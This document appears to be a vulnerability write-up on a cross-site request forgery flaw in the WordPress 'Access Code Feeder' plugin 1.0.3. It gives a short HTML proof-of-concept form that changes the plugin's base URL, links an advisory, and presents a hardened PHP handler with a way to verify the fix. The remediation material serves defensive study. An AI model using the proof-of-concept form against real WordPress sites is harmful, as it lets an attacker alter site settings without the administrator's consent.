The PoC is as follows:
<html>
<body>
<!-- Cross-site form: POSTs new_url to the plugin's base_url_action AJAX action; no nonce field is included -->
<form action="http://localhost/new/wp-admin/admin-ajax.php?action=base_url_action" method="POST" enctype="multipart/form-data">
<input type="hidden" name="new_url" value="http://www.google.com">
<input type="submit" name="Submit">
</form>
</body>
</html>
Vulnerability details: https://patchstack.com/database/vulnerability/access-code-feeder/wordpress-access-code-feeder-plugin-1-0-3-cross-site-request-forgery-csrf-vulnerability
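
The form above succeeds because the request carries nothing an attacker's page cannot supply. The sketch below is an added example, not the plugin's own source: it shows the handler pattern that allows this beside a hardened version that uses WordPress nonces and a capability check. The `acf_demo_*` function names, the `acf_demo_base_url` option and the `acf_demo_set_base_url` nonce action are hypothetical; only the `base_url_action` action and the `new_url` parameter come from the PoC.

```php
<?php
// Added example. Hypothetical names: acf_demo_* functions, the
// 'acf_demo_base_url' option, the 'acf_demo_set_base_url' nonce action.

// Pattern that permits CSRF (shown for contrast, deliberately not registered):
// the state change relies on the admin's session cookie alone, which the
// browser attaches to a cross-site POST automatically.
function acf_demo_set_base_url_unprotected() {
    update_option( 'acf_demo_base_url', esc_url_raw( wp_unslash( $_POST['new_url'] ) ) );
    wp_send_json_success();
}

// Hardened handler.
function acf_demo_set_base_url() {
    // 1. Authorisation: only administrators may change this setting.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    // 2. CSRF: require a nonce bound to this action and the current user.
    //    check_ajax_referer() ends the request with a 403 when the nonce is
    //    missing or invalid, so the PoC form's POST stops here.
    check_ajax_referer( 'acf_demo_set_base_url', '_ajax_nonce' );

    // 3. Input validation: accept only a well-formed http(s) URL.
    $raw = isset( $_POST['new_url'] ) ? wp_unslash( $_POST['new_url'] ) : '';
    $url = esc_url_raw( $raw, array( 'http', 'https' ) );
    if ( '' === $url ) {
        wp_send_json_error( array( 'message' => 'Invalid URL' ), 400 );
    }

    update_option( 'acf_demo_base_url', $url );
    wp_send_json_success( array( 'base_url' => $url ) );
}
// Register only the authenticated hook; no wp_ajax_nopriv_ variant.
add_action( 'wp_ajax_base_url_action', 'acf_demo_set_base_url' );

// Settings form (admin side): emit the nonce the handler expects.
function acf_demo_render_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-ajax.php?action=base_url_action' ) ) . '">';
    wp_nonce_field( 'acf_demo_set_base_url', '_ajax_nonce' );
    echo '<input type="url" name="new_url" required>';
    echo '<input type="submit" value="Save">';
    echo '</form>';
}
```

To confirm a fix, replay the PoC form while logged in as an administrator: the request should return a 403 and the stored URL should be unchanged.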